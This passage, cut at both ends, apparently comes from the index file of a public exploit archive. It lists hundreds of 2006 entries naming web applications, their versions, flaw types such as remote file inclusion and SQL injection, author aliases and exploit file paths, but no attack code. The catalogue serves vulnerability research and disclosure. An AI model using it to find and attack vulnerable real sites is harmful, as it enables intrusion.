Inclusion",2006-09-15,Kacper,php,webapps, -2374,exploits/php/webapps/2374.pl,"Site@School 2.4.02 - Arbitrary File Upload",2006-09-15,simo64,php,webapps, -2375,exploits/php/webapps/2375.txt,"Coppermine Photo Gallery 1.2.2b (Nuke Addon) - Remote File Inclusion",2006-09-15,3l3ctric-Cracker,php,webapps, -2376,exploits/php/webapps/2376.pl,"phpQuiz 0.1.2 - SQL Injection / Code Execution",2006-09-16,simo64,php,webapps, -2377,exploits/php/webapps/2377.txt,"aeDating 4.1 - dir[inc] Remote File Inclusion",2006-09-16,NeXtMaN,php,webapps, -2378,exploits/php/webapps/2378.php,"GNUTURK 2G - 't_id' SQL Injection",2006-09-16,p2y,php,webapps, -2379,exploits/php/webapps/2379.txt,"Mambo Component com_registration_detailed 4.1 - Remote File Inclusion",2006-09-16,k1tk4t,php,webapps, -2380,exploits/php/webapps/2380.txt,"UNAK-CMS 1.5 - 'dirroot' Remote File Inclusion",2006-09-16,SHiKaA,php,webapps, -2381,exploits/php/webapps/2381.txt,"guanxiCRM Business Solution 0.9.1 - Remote File Inclusion",2006-09-16,SHiKaA,php,webapps, -2382,exploits/php/webapps/2382.pl,"Zix Forum 1.12 - 'RepId' SQL Injection (2)",2006-09-17,SlimTim10,php,webapps, -2383,exploits/php/webapps/2383.txt,"MobilePublisherPHP 1.5 RC2 - Remote File Inclusion",2006-09-17,Timq,php,webapps, -2384,exploits/asp/webapps/2384.txt,"Q-Shop 3.5 - 'browse.asp' SQL Injection",2006-09-17,ajann,asp,webapps, -2385,exploits/asp/webapps/2385.txt,"Techno Dreams FAQ Manager 1.0 - SQL Injection",2006-09-17,ajann,asp,webapps, -2386,exploits/asp/webapps/2386.txt,"Techno Dreams Articles & Papers 2.0 - SQL Injection",2006-09-17,ajann,asp,webapps, -2387,exploits/asp/webapps/2387.txt,"Charon Cart 3.0 - 'Review.asp' SQL Injection",2006-09-17,ajann,asp,webapps, -2388,exploits/php/webapps/2388.txt,"CMtextS 1.0 - '/users_logins/admin.txt' Credentials Disclosure",2006-09-17,Kacper,php,webapps, -2389,exploits/php/webapps/2389.pl,"Alstrasoft e-Friends 4.85 - Remote Command Execution",2006-09-18,Kw3[R]Ln,php,webapps, -2390,exploits/php/webapps/2390.txt,"PNPHPBB2 < 1.2g - 'phpbb_root_path' Remote File Inclusion",2006-09-18,AzzCoder,php,webapps, -2391,exploits/php/webapps/2391.php,"Exponent CMS 0.96.3 - 'view' Remote Command Execution",2006-09-19,rgod,php,webapps, -2392,exploits/php/webapps/2392.txt,"Pie Cart Pro - 'Home_Path' Remote File Inclusion",2006-09-19,"Saudi Hackrz",php,webapps, -2393,exploits/php/webapps/2393.txt,"Pie Cart Pro - 'Inc_Dir' Remote File Inclusion",2006-09-19,SnIpEr_SA,php,webapps, -2394,exploits/php/webapps/2394.php,"more.groupware 0.74 - 'new_calendarid' SQL Injection",2006-09-19,x128,php,webapps, -2395,exploits/asp/webapps/2395.txt,"Tekman Portal 1.0 - 'tr' SQL Injection",2006-09-19,"Fix TR",asp,webapps, -2396,exploits/php/webapps/2396.txt,"Simple Discussion Board 0.1.0 - Remote File Inclusion",2006-09-19,CeNGiZ-HaN,php,webapps, -2397,exploits/php/webapps/2397.py,"MyReview 1.9.4 - 'email' SQL Injection / Code Execution",2006-09-19,STILPU,php,webapps, -2398,exploits/php/webapps/2398.txt,"Digital WebShop 1.128 - Multiple Remote File Inclusions",2006-09-19,ajann,php,webapps, -2399,exploits/php/webapps/2399.txt,"BCWB 0.99 - 'ROOT_PATH' Remote File Inclusion",2006-09-19,ajann,php,webapps, -2402,exploits/php/webapps/2402.php,"PHP Blue Dragon CMS 2.9.1 - Cross-Site Scripting / SQL Injection Code Execution",2006-09-20,Kacper,php,webapps, -2405,exploits/php/webapps/2405.txt,"AllMyGuests 0.4.1 - 'cfg_serverpath' Remote File Inclusion",2006-09-20,Br@Him,php,webapps, -2406,exploits/php/webapps/2406.php,"exV2 < 2.0.4.3 - 'sort' SQL Injection",2006-09-21,rgod,php,webapps, -2407,exploits/php/webapps/2407.txt,"pNews 1.1.0 - 'nbs' Remote File Inclusion",2006-09-21,CvIr.System,php,webapps, -2409,exploits/php/webapps/2409.txt,"PHPartenaire 1.0 - 'dix.php3' Remote File Inclusion",2006-09-21,DaDIsS,php,webapps, -2410,exploits/php/webapps/2410.txt,"phpQuestionnaire 3.12 - 'phpQRootDir' Remote File Inclusion",2006-09-21,Solpot,php,webapps, -2411,exploits/php/webapps/2411.pl,"ProgSys 0.156 - 'RR.php' Remote File Inclusion",2006-09-21,Kacper,php,webapps, -2413,exploits/php/webapps/2413.txt,"SolidState 0.4 - Multiple Remote File Inclusions",2006-09-21,Kacper,php,webapps, -2414,exploits/php/webapps/2414.txt,"Wili-CMS 0.1.1 - Remote File Inclusion / Cross-Site Scripting / Full Path Disclosure",2006-09-21,"HACKERS PAL",php,webapps, -2415,exploits/php/webapps/2415.php,"exV2 < 2.0.4.3 - 'extract()' Remote Command Execution",2006-09-22,rgod,php,webapps, -2416,exploits/asp/webapps/2416.txt,"xweblog 2.1 - 'kategori.asp' SQL Injection",2006-09-22,Muhacir,asp,webapps, -2417,exploits/php/webapps/2417.php,"Eskolar CMS 0.9.0.0 - 'index.php' SQL Injection",2006-09-22,"HACKERS PAL",php,webapps, -2418,exploits/php/webapps/2418.php,"e-Vision CMS 2.0 - 'all_users.php' SQL Injection",2006-09-22,"HACKERS PAL",php,webapps, -2419,exploits/php/webapps/2419.txt,"Web-News 1.6.3 - 'template.php' Remote File Inclusion",2006-09-24,Drago84,php,webapps, -2420,exploits/php/webapps/2420.txt,"ZoomStats 1.0.2 - 'mysql.php' Remote File Inclusion",2006-09-24,Drago84,php,webapps, -2421,exploits/asp/webapps/2421.pl,"Spidey Blog Script 1.5 - 'proje_goster.asp' SQL Injection (2)",2006-09-24,gega,asp,webapps, -2422,exploits/php/webapps/2422.txt,"Advaced-Clan-Script 3.4 - 'mcf.php' Remote File Inclusion",2006-09-24,xdh,php,webapps, -2423,exploits/asp/webapps/2423.txt,"iyzi Forum 1.0 Beta 3 - SQL Injection",2006-09-24,"Fix TR",asp,webapps, -2424,exploits/php/webapps/2424.txt,"SyntaxCMS 1.3 - '0004_init_urls.php' Remote File Inclusion",2006-09-24,MoHaJaLi,php,webapps, -2427,exploits/php/webapps/2427.txt,"Polaring 0.04.03 - 'general.php' Remote File Inclusion",2006-09-25,Drago84,php,webapps, -2428,exploits/php/webapps/2428.txt,"PBLang 4.66z - 'temppath' Remote File Inclusion",2006-09-25,SHiKaA,php,webapps, -2429,exploits/php/webapps/2429.txt,"Minerva 2.0.21 build 238a - 'phpbb_root_path' File Inclusion",2006-09-25,SHiKaA,php,webapps, -2431,exploits/php/webapps/2431.txt,"evoBB 0.3 - 'path' Remote File Inclusion",2006-09-25,SHiKaA,php,webapps, -2432,exploits/php/webapps/2432.txt,"BrudaNews 1.1 - '/admin/index.php' Remote File Inclusion",2006-09-25,SHiKaA,php,webapps, -2433,exploits/php/webapps/2433.txt,"BrudaGB 1.1 - '/admin/index.php' Remote File Inclusion",2006-09-25,SHiKaA,php,webapps, -2434,exploits/php/webapps/2434.txt,"faceStones personal 2.0.42 - 'fs_form_links.php' File Inclusion",2006-09-25,SHiKaA,php,webapps, -2435,exploits/php/webapps/2435.txt,"Web//News 1.4 - 'parser.php' Remote File Inclusion (1)",2006-09-26,ThE-WoLf-KsA,php,webapps, -2436,exploits/php/webapps/2436.txt,"A-Blog 2.0 - 'menu.php' Remote File Inclusion",2006-09-26,Drago84,php,webapps, -2437,exploits/php/webapps/2437.php,"paBugs 2.0 Beta 3 - 'class.mysql.php' Remote File Inclusion",2006-09-26,Kacper,php,webapps, -2438,exploits/php/webapps/2438.txt,"Kietu? < 4.0.0b2 - 'hit.php' Remote File Inclusion",2006-09-26,D_7J,php,webapps, -2439,exploits/php/webapps/2439.txt,"Newswriter SW 1.42 - 'editfunc.inc.php' File Inclusion",2006-09-27,"Silahsiz Kuvvetler",php,webapps, -2441,exploits/php/webapps/2441.pl,"Blog Pixel Motion 2.1.1 - PHP Code Execution / Create Admin",2006-09-27,DarkFig,php,webapps, -2442,exploits/php/webapps/2442.txt,"A-Blog 2.0 - Multiple Remote File Inclusions",2006-09-27,v1per-haCker,php,webapps, -2443,exploits/php/webapps/2443.txt,"Newswriter SW 1.4.2 - 'main.inc.php' Remote File Inclusion",2006-09-27,"Mehmet Ince",php,webapps, -2446,exploits/php/webapps/2446.php,"PPA Gallery 1.0 - 'functions.inc.php' Remote File Inclusion",2006-09-28,Kacper,php,webapps, -2447,exploits/php/webapps/2447.php,"KGB 1.87 - Local File Inclusion / Remote Code Execution",2006-09-28,Kacper,php,webapps, -2449,exploits/php/webapps/2449.txt,"Les Visiteurs (Visitors) 2.0 - 'config.inc.php' File Inclusion",2006-09-28,D_7J,php,webapps, -2450,exploits/php/webapps/2450.txt,"TagIt! Tagboard 2.1.b b2 - 'index.php' Remote File Inclusion",2006-09-28,Kernel-32,php,webapps, -2451,exploits/php/webapps/2451.txt,"phpMyWebmin 1.0 - 'window.php' Remote File Inclusion",2006-09-28,Kernel-32,php,webapps, -2452,exploits/php/webapps/2452.txt,"PHPSecurePages 0.28b - 'secure.php' Remote File Inclusion",2006-09-28,D_7J,php,webapps, -2453,exploits/php/webapps/2453.txt,"phpBB XS 0.58a - 'phpbb_root_path' Remote File Inclusion",2006-09-28,"Mehmet Ince",php,webapps, -2454,exploits/php/webapps/2454.txt,"PowerPortal 1.3a - 'index.php' Remote File Inclusion",2006-09-29,v1per-haCker,php,webapps, -2455,exploits/php/webapps/2455.php,"VideoDB 2.2.1 - 'pdf.php' Remote File Inclusion",2006-09-29,Kacper,php,webapps, -2456,exploits/php/webapps/2456.php,"PHP Krazy Image Hosting 0.7a - 'display.php' SQL Injection",2006-09-29,Trex,php,webapps, -2457,exploits/php/webapps/2457.php,"UBBCentral UBB.Threads 6.5.1.1 - 'doeditconfig.php' Code Execution",2006-09-29,"HACKERS PAL",php,webapps, -2459,exploits/php/webapps/2459.txt,"Forum82 < 2.5.2b - 'repertorylevel' Multiple File Inclusions",2006-09-29,"Silahsiz Kuvvetler",php,webapps, -2461,exploits/php/webapps/2461.txt,"VAMP Webmail 2.0beta1 - 'yesno.phtml' Remote File Inclusion",2006-09-30,Drago84,php,webapps, -2462,exploits/php/webapps/2462.txt,"phpMyWebmin 1.0 - 'target' Remote File Inclusion",2006-09-30,"Mehmet Ince",php,webapps, -2465,exploits/php/webapps/2465.php,"BasiliX 1.1.1 - 'BSX_LIBDIR' Remote File Inclusion",2006-10-01,Kacper,php,webapps, -2468,exploits/php/webapps/2468.txt,"BBaCE 3.5 - '/includes/functions.php' Remote File Inclusion",2006-10-02,SpiderZ,php,webapps, -2469,exploits/php/webapps/2469.pl,"JAF CMS 4.0 RC1 - 'forum.php' Remote File Inclusion",2006-10-03,Kacper,php,webapps, -2470,exploits/php/webapps/2470.txt,"phpMyProfiler 0.9.6 - Remote File Inclusion",2006-10-03,mozi,php,webapps, -2471,exploits/php/webapps/2471.pl,"Travelsized CMS 0.4 - 'FrontPage.php' Remote File Inclusion",2006-10-03,Kacper,php,webapps, -2472,exploits/php/webapps/2472.pl,"Klinza Professional CMS 5.0.1 - 'show_hlp.php' File Inclusion",2006-10-03,Kacper,php,webapps, -2473,exploits/php/webapps/2473.c,"Invision Gallery 2.0.7 - 'readfile()' / SQL Injection",2006-10-03,1nf3ct0r,php,webapps, -2474,exploits/php/webapps/2474.txt,"JAF CMS 4.0 RC1 - Multiple Remote File Inclusions",2006-10-04,"ThE TiGeR",php,webapps, -2475,exploits/php/webapps/2475.txt,"phpBB Admin Topic Action Logging Mod 0.94b - Remote File Inclusion",2006-10-04,SpiderZ,php,webapps, -2476,exploits/php/webapps/2476.txt,"PHPGreetz 0.99 - 'footer.php' Remote File Inclusion",2006-10-04,mozi,php,webapps, -2477,exploits/php/webapps/2477.txt,"phpBB Static Topics 1.0 - 'phpbb_root_path' File Inclusion",2006-10-04,Kw3[R]Ln,php,webapps, -2478,exploits/php/webapps/2478.txt,"phpMyTeam 2.0 - 'smileys_dir' Remote File Inclusion",2006-10-05,"Mehmet Ince",php,webapps, -2479,exploits/php/webapps/2479.txt,"PHP Classifieds 7.1 - 'index.php' SQL Injection",2006-10-05,Kzar,php,webapps, -2480,exploits/php/webapps/2480.txt,"phpBB Security Suite Mod 1.0.0 - 'logger_engine.php' Remote File Inclusion",2006-10-05,SpiderZ,php,webapps, -2481,exploits/php/webapps/2481.txt,"Dimension of phpBB 0.2.6 - 'phpbb_root_path' Remote File Inclusions",2006-10-05,SpiderZ,php,webapps, -2483,exploits/php/webapps/2483.txt,"phpBB User Viewed Posts Tracker 1.0 - Remote File Inclusion",2006-10-06,"Mehmet Ince",php,webapps, -2484,exploits/php/webapps/2484.txt,"FreeForum 0.9.7 - 'forum.php' Remote File Inclusion",2006-10-07,"Mehmet Ince",php,webapps, -2485,exploits/php/webapps/2485.pl,"Cahier de texte 2.0 - 'lire.php' SQL Injection",2006-10-07,s4mi,php,webapps, -2486,exploits/php/webapps/2486.txt,"phpBB Random User Registration Number 1.0 Mod - Remote File Inclusion",2006-10-07,bd0rk,php,webapps, -2487,exploits/php/webapps/2487.php,"4Images 1.7.x - 'search.php' SQL Injection",2006-10-08,Synsta,php,webapps, -2488,exploits/php/webapps/2488.txt,"PHPMyNews 1.4 - 'cfg_include_dir' Remote File Inclusion",2006-10-08,"Mehmet Ince",php,webapps, -2489,exploits/php/webapps/2489.pl,"Ciamos CMS 0.9.6b - 'config.php' Remote File Inclusion",2006-10-08,Kacper,php,webapps, -2490,exploits/php/webapps/2490.txt,"Freenews 1.1 - 'moteur.php' Remote File Inclusion",2006-10-08,"Mehmet Ince",php,webapps, -2491,exploits/php/webapps/2491.pl,"PHPPC 1.03 RC1 - '/lib/functions.inc.php' Remote File Inclusion",2006-10-08,ThE-WoLf-KsA,php,webapps, -2493,exploits/php/webapps/2493.pl,"docmint 2.0 - '/engine/require.php' Remote File Inclusion",2006-10-09,K-159,php,webapps, -2494,exploits/php/webapps/2494.txt,"OpenDock Easy Doc 1.4 - 'doc_directory' File Inclusion",2006-10-09,the_day,php,webapps, -2495,exploits/php/webapps/2495.txt,"OpenDock Easy Blog 1.4 - 'doc_directory' File Inclusion",2006-10-09,the_day,php,webapps, -2496,exploits/php/webapps/2496.txt,"WebYep 1.1.9 - 'webyep_sIncludePath' File Inclusion",2006-10-09,the_day,php,webapps, -2497,exploits/php/webapps/2497.txt,"OpenDock Easy Gallery 1.4 - 'doc_directory' File Inclusion",2006-10-09,the_day,php,webapps, -2498,exploits/php/webapps/2498.php,"Flatnuke 2.5.8 - 'file()' Privilege Escalation / Code Execution",2006-10-10,rgod,php,webapps, -2499,exploits/php/webapps/2499.php,"Flatnuke 2.5.8 - 'userlang' Local Inclusion / Delete All Users",2006-10-10,rgod,php,webapps, -2500,exploits/php/webapps/2500.pl,"phpMyAgenda 3.1 - '/templates/header.php3' Local File Inclusion",2006-10-10,"Nima Salehi",php,webapps, -2501,exploits/php/webapps/2501.txt,"TribunaLibre 3.12 Beta - 'ftag.php' Remote File Inclusion",2006-10-10,DarkFig,php,webapps, -2502,exploits/php/webapps/2502.txt,"registroTL - 'main.php' Remote File Inclusion",2006-10-10,DarkFig,php,webapps, -2503,exploits/php/webapps/2503.txt,"compteur 2.0 - 'param_editor.php' Remote File Inclusion",2006-10-10,DarkFig,php,webapps, -2504,exploits/php/webapps/2504.txt,"eboli - 'index.php' Remote File Inclusion",2006-10-10,DarkFig,php,webapps, -2505,exploits/php/webapps/2505.txt,"JASmine 0.0.2 - 'index.php' Remote File Inclusion",2006-10-10,DarkFig,php,webapps, -2506,exploits/php/webapps/2506.txt,"Foafgen 0.3 - 'redir.php' Local Source Disclosure",2006-10-10,DarkFig,php,webapps, -2507,exploits/php/webapps/2507.txt,"Album Photo Sans Nom 1.6 - Remote Source Disclosure",2006-10-10,DarkFig,php,webapps, -2508,exploits/php/webapps/2508.txt,"vTiger CRM 4.2 - 'calpath' Multiple Remote File Inclusions",2006-10-10,the_day,php,webapps, -2509,exploits/php/webapps/2509.txt,"Exhibit Engine 1.5 RC 4 - 'photo_comment.php' File Inclusion",2006-10-10,Kacper,php,webapps, -2510,exploits/php/webapps/2510.txt,"Claroline 1.8.0 rc1 - 'import.lib.php' Remote File Inclusion",2006-10-10,k1tk4t,php,webapps, -2511,exploits/php/webapps/2511.txt,"PHPLibrary 1.5.3 - 'grid3.lib.php' Remote File Inclusion",2006-10-10,k1tk4t,php,webapps, -2512,exploits/php/webapps/2512.txt,"Jinzora 2.1 - 'media.php' Remote File Inclusion",2006-10-10,k1tk4t,php,webapps, -2513,exploits/php/webapps/2513.txt,"ae2 - 'standart.inc.php' Remote File Inclusion",2006-10-10,k1tk4t,php,webapps, -2514,exploits/php/webapps/2514.txt,"n@board 3.1.9e - 'naboard_pnr.php' Remote File Inclusion",2006-10-11,mdx,php,webapps, -2516,exploits/php/webapps/2516.pl,"CommunityPortals 1.0 - 'import-archive.php' File Inclusion",2006-10-11,"Nima Salehi",php,webapps, -2517,exploits/php/webapps/2517.pl,"PHP News Reader 2.6.4 - 'phpBB.inc.php' Remote File Inclusion",2006-10-11,"Nima Salehi",php,webapps, -2518,exploits/php/webapps/2518.txt,"SH-News 3.1 - 'scriptpath' Remote File Inclusion",2006-10-11,v1per-haCker,php,webapps, -2519,exploits/php/webapps/2519.txt,"Minichat 6.0 - 'ftag.php' Remote File Inclusion",2006-10-11,Zickox,php,webapps, -2520,exploits/php/webapps/2520.txt,"Softerra PHP Developer Library 1.5.3 - Remote File Inclusion",2006-10-12,MP,php,webapps, -2521,exploits/php/webapps/2521.txt,"Download-Engine 1.4.2 - 'spaw' Remote File Inclusion",2006-10-12,v1per-haCker,php,webapps, -2522,exploits/php/webapps/2522.txt,"phpBB Journals System Mod 1.0.2 RC2 - Remote File Inclusion",2006-10-12,"Nima Salehi",php,webapps, -2525,exploits/php/webapps/2525.pl,"phpBB Insert User Mod 0.1.2 - Remote File Inclusion",2006-10-12,"Nima Salehi",php,webapps, -2526,exploits/php/webapps/2526.txt,"PHPht Topsites - 'common.php' Remote File Inclusion",2006-10-12,"Mehmet Ince",php,webapps, -2527,exploits/php/webapps/2527.c,"Invision Gallery 2.0.7 (Linux) - 'readfile()' / SQL Injection",2006-10-12,ShadOS,php,webapps, -2528,exploits/php/webapps/2528.txt,"MiniBB keyword_replacer 1.0 - 'pathToFiles' File Inclusion",2006-10-12,Kw3[R]Ln,php,webapps, -2529,exploits/php/webapps/2529.txt,"AFGB Guestbook 2.2 - 'Htmls' Remote File Inclusion",2006-10-12,mdx,php,webapps, -2531,exploits/php/webapps/2531.txt,"phpBB Import Tools Mod 0.1.4 - Remote File Inclusion",2006-10-12,boecke,php,webapps, -2532,exploits/php/webapps/2532.txt,"phpBB Ajax Shoutbox 0.0.5 - Remote File Inclusion",2006-10-12,boecke,php,webapps, -2533,exploits/php/webapps/2533.txt,"phpBB SpamBlocker Mod 1.0.2 - Remote File Inclusion",2006-10-12,"Nima Salehi",php,webapps, -2534,exploits/php/webapps/2534.pl,"Redaction System 1.0 - 'lang_prefix' Remote File Inclusion",2006-10-12,r0ut3r,php,webapps, -2535,exploits/php/webapps/2535.txt,"PHPMyConferences 8.0.2 - 'menu.inc.php' File Inclusion",2006-10-13,k1tk4t,php,webapps, -2536,exploits/php/webapps/2536.txt,"Open Conference Systems 1.1.4 - 'fullpath' File Inclusion",2006-10-13,k1tk4t,php,webapps, -2537,exploits/php/webapps/2537.pl,"maluinfo 206.2.38 - 'bb_usage_stats.php' Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps, -2538,exploits/php/webapps/2538.pl,"phpBB PlusXL 2.0_272 - 'constants.php' Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps, -2539,exploits/php/webapps/2539.txt,"Genepi 1.6 - 'genepi.php' Remote File Inclusion",2006-10-13,Kw3[R]Ln,php,webapps, -2540,exploits/php/webapps/2540.txt,"Cdsagenda 4.2.9 - 'SendAlertEmail.php' File Inclusion",2006-10-13,Drago84,php,webapps, -2544,exploits/php/webapps/2544.pl,"phpBB Amazonia Mod - 'zufallscodepart.php' Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps, -2545,exploits/php/webapps/2545.pl,"phpBB News Defilante Horizontale 4.1.1 - Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps, -2546,exploits/php/webapps/2546.pl,"phpBB lat2cyr Mod 1.0.1 - 'lat2cyr.php' Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps, -2547,exploits/php/webapps/2547.pl,"phpBB SpamOborona Mod 1.0b - Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps, -2548,exploits/php/webapps/2548.pl,"phpBB RPG Events 1.0 - 'functions_rpg_events' Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps, -2549,exploits/php/webapps/2549.pl,"phpBB SearchIndexer Mod - 'archive_topic.php' Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps, -2550,exploits/php/webapps/2550.pl,"phpBB Prillian French Mod 0.8.0 - Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps, -2551,exploits/php/webapps/2551.txt,"phpBB ACP User Registration Mod 1.0 - Remote File Inclusion",2006-10-13,bd0rk,php,webapps, -2552,exploits/php/webapps/2552.pl,"phpBB Security 1.0.1 - 'PHP_security.php' Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps, -2553,exploits/php/webapps/2553.txt,"YaBBSM 3.0.0 - 'Offline.php' Remote File Inclusion",2006-10-13,SilenZ,php,webapps, -2554,exploits/php/webapps/2554.php,"cPanel 10.8.x - 'cpwrap' via MySQLAdmin Privilege Escalation (PHP)",2006-10-13,"Nima Salehi",php,webapps, -2555,exploits/php/webapps/2555.txt,"CentiPaid 1.4.2 - 'centipaid_class.php' Remote File Inclusion",2006-10-14,Kw3[R]Ln,php,webapps, -2556,exploits/php/webapps/2556.txt,"E-Uploader Pro 1.0 - Image Upload / Code Execution",2006-10-14,Kacper,php,webapps, -2557,exploits/php/webapps/2557.txt,"IncCMS Core 1.0.0 - 'settings.php' Remote File Inclusion",2006-10-14,Kacper,php,webapps, -2558,exploits/php/webapps/2558.txt,"Jinzora 2.6 - '/extras/mt.php' Remote File Inclusion",2006-10-14,ddoshomo,php,webapps, -2559,exploits/php/webapps/2559.txt,"CyberBrau 0.9.4 - '/forum/track.php' Remote File Inclusion",2006-10-15,Kw3[R]Ln,php,webapps, -2560,exploits/php/webapps/2560.txt,"CampSite 2.6.1 - 'g_documentRoot' Remote File Inclusion",2006-10-15,Kw3[R]Ln,php,webapps, -2561,exploits/php/webapps/2561.txt,"NuralStorm Webmail 0.98b - 'process.php' Remote File Inclusion",2006-10-15,Kw3[R]Ln,php,webapps, -2562,exploits/php/webapps/2562.txt,"AROUNDMe 0.5.2 - 'templatePath' Remote File Inclusion",2006-10-15,Kw3[R]Ln,php,webapps, -2563,exploits/php/webapps/2563.pl,"phpBurningPortal 1.0.1 - 'lang_path' Remote File Inclusion",2006-10-15,r0ut3r,php,webapps, -2564,exploits/php/webapps/2564.pl,"phpBBFM 206-3-3 - 'phpbb_root_path' Remote File Inclusion",2006-10-15,Kamalian,php,webapps, -2566,exploits/php/webapps/2566.txt,"DigitalHive 2.0 RC2 - 'base_include.php' Remote File Inclusion",2006-10-15,SHiKaA,php,webapps, -2567,exploits/php/webapps/2567.txt,"Def-Blog 1.0.3 - 'comadd.php' SQL Injection",2006-10-15,SHiKaA,php,webapps, -2568,exploits/php/webapps/2568.txt,"webSPELL 4.01.01 - 'getsquad' SQL Injection",2006-10-15,Kiba,php,webapps, -2570,exploits/php/webapps/2570.txt,"OpenDock FullCore 4.4 - Remote File Inclusion",2006-10-16,Matdhule,php,webapps, -2572,exploits/php/webapps/2572.txt,"Osprey 1.0 - 'GetRecord.php' Remote File Inclusion",2006-10-16,Kw3[R]Ln,php,webapps, -2573,exploits/php/webapps/2573.php,"Comdev One Admin 4.1 - 'Adminfoot.php' Remote Code Execution",2006-10-16,w4ck1ng,php,webapps, -2574,exploits/php/webapps/2574.php,"Simplog 0.9.3.1 - 'comments.php' SQL Injection",2006-10-16,w4ck1ng,php,webapps, -2575,exploits/php/webapps/2575.php,"Boonex Dolphin 5.2 - 'index.php' Remote Code Execution",2006-10-16,w4ck1ng,php,webapps, -2576,exploits/php/webapps/2576.txt,"Specimen Image Database - 'client.php' Remote File Inclusion",2006-10-16,Kw3[R]Ln,php,webapps, -2577,exploits/php/webapps/2577.txt,"P-News 1.16 - Remote File Inclusion",2006-10-16,vegas78,php,webapps, -2578,exploits/php/webapps/2578.txt,"PHPMyManga 0.8.1 - 'template.php' Multiple File Inclusions",2006-10-16,nuffsaid,php,webapps, -2579,exploits/php/webapps/2579.pl,"WoltLab Burning Book 1.1.2 - SQL Injection (PoC)",2006-10-16,ShAnKaR,php,webapps, -2582,exploits/php/webapps/2582.txt,"ALiCE-CMS 0.1 - 'CONFIG[local_root]' Remote File Inclusion",2006-10-17,nuffsaid,php,webapps, -2583,exploits/php/webapps/2583.php,"WSN Forum 1.3.4 - 'prestart.php' Remote Code Execution",2006-10-17,Kacper,php,webapps, -2584,exploits/php/webapps/2584.pl,"PHPRecipeBook 2.35 - 'g_rb_basedir' Remote File Inclusion",2006-10-17,r0ut3r,php,webapps, -2585,exploits/php/webapps/2585.txt,"PHPmybibli 3.0.1 - Multiple Remote File Inclusions",2006-10-17,the_day,php,webapps, -2588,exploits/php/webapps/2588.txt,"Easynews 4.4.1 - 'admin.php' Authentication Bypass",2006-10-17,nuffsaid,php,webapps, -2589,exploits/php/webapps/2589.txt,"Brim 1.2.1 - 'renderer' Multiple Remote File Inclusions",2006-10-17,mdx,php,webapps, -2590,exploits/php/webapps/2590.txt,"PHPPowerCards 2.10 - 'txt.inc.php' Remote Code Execution",2006-10-18,nuffsaid,php,webapps, -2591,exploits/php/webapps/2591.txt,"PHP AMX 0.90 - '/plugins/main.php' Remote File Inclusion",2006-10-18,MP,php,webapps, -2592,exploits/asp/webapps/2592.html,"Active Bulletin Board 1.1b2 - Remote User Pass Change",2006-10-18,ajann,asp,webapps, -2593,exploits/php/webapps/2593.php,"PHP-Post 1.01 - 'template' Remote Code Execution",2006-10-18,Kacper,php,webapps, -2594,exploits/php/webapps/2594.php,"YapBB 1.2 Beta2 - 'yapbb_session.php' Remote File Inclusion",2006-10-18,Kacper,php,webapps, -2595,exploits/php/webapps/2595.txt,"LoCal Calendar 1.1 - 'lcUser.php' Remote File Inclusion",2006-10-18,o0xxdark0o,php,webapps, -2596,exploits/php/webapps/2596.pl,"EPNadmin 0.7 - 'constantes.inc.php' Remote File Inclusion",2006-10-19,Kw3[R]Ln,php,webapps, -2598,exploits/php/webapps/2598.php,"PH Pexplorer 0.24 - 'explorer_load_lang.php' Local File Inclusion",2006-10-19,Kacper,php,webapps, -2599,exploits/php/webapps/2599.txt,"pandaBB - 'displayCategory' Remote File Inclusion",2006-10-19,nukedclx,php,webapps, -2600,exploits/php/webapps/2600.txt,"Segue CMS 1.5.8 - 'themesdir' Remote File Inclusion",2006-10-19,nuffsaid,php,webapps, -2602,exploits/php/webapps/2602.txt,"Power Phlogger 2.0.9 - 'config.inc.php3' File Inclusion",2006-10-19,x_w0x,php,webapps, -2603,exploits/php/webapps/2603.txt,"Lou Portail 1.4.1 - 'admin_module.php' Remote File Inclusion",2006-10-20,MP,php,webapps, -2604,exploits/php/webapps/2604.txt,"WGCC 0.5.6b - 'quiz.php' SQL Injection",2006-10-20,ajann,php,webapps, -2605,exploits/php/webapps/2605.txt,"RSSonate - 'xml2rss.php' Remote File Inclusion",2006-10-21,Kw3[R]Ln,php,webapps, -2606,exploits/php/webapps/2606.txt,"CASTOR 1.1.1 - '/lib/rs.php' Remote File Inclusion",2006-10-21,Kw3[R]Ln,php,webapps, -2607,exploits/php/webapps/2607.txt,"kawf 1.0 - 'main.php' Remote File Inclusion",2006-10-21,o0xxdark0o,php,webapps, -2608,exploits/php/webapps/2608.txt,"Virtual Law Office - 'phpc_root_path' Remote File Inclusion",2006-10-21,"Mehmet Ince",php,webapps, -2609,exploits/php/webapps/2609.txt,"Open Meetings Filing Application - Remote File Inclusion",2006-10-21,"Mehmet Ince",php,webapps, -2611,exploits/php/webapps/2611.txt,"Trawler Web CMS 1.8.1 - Multiple Remote File Inclusions",2006-10-21,k1tk4t,php,webapps, -2612,exploits/php/webapps/2612.txt,"PGOSD - '/misc/function.php3' Remote File Inclusion",2006-10-22,"Mehmet Ince",php,webapps, -2613,exploits/php/webapps/2613.txt,"Mambo Module MambWeather 1.8.1 - Remote File Inclusion",2006-10-22,h4ntu,php,webapps, -2614,exploits/php/webapps/2614.txt,"Net_DNS 0.3 - '/DNS/RR.php' Remote File Inclusion",2006-10-22,Drago84,php,webapps, -2615,exploits/php/webapps/2615.txt,"SpeedBerg 1.2beta1 - 'SPEEDBERG_PATH' File Inclusion",2006-10-22,k1tk4t,php,webapps, -2616,exploits/php/webapps/2616.php,"JaxUltraBB 2.0 - 'delete.php' Remote Auto Deface",2006-10-22,Kacper,php,webapps, -2617,exploits/php/webapps/2617.php,"PHP-Nuke 7.9 - 'Encyclopedia' SQL Injection",2006-10-22,Paisterist,php,webapps, -2620,exploits/php/webapps/2620.txt,"EZ-Ticket 0.0.1 - 'common.php' Remote File Inclusion",2006-10-22,"the master",php,webapps, -2621,exploits/php/webapps/2621.txt,"Fully Modded phpBB 2021.4.40 - Multiple File Inclusions",2006-10-23,020,php,webapps, -2622,exploits/php/webapps/2622.txt,"OTSCMS 2.1.3 - Multiple Remote 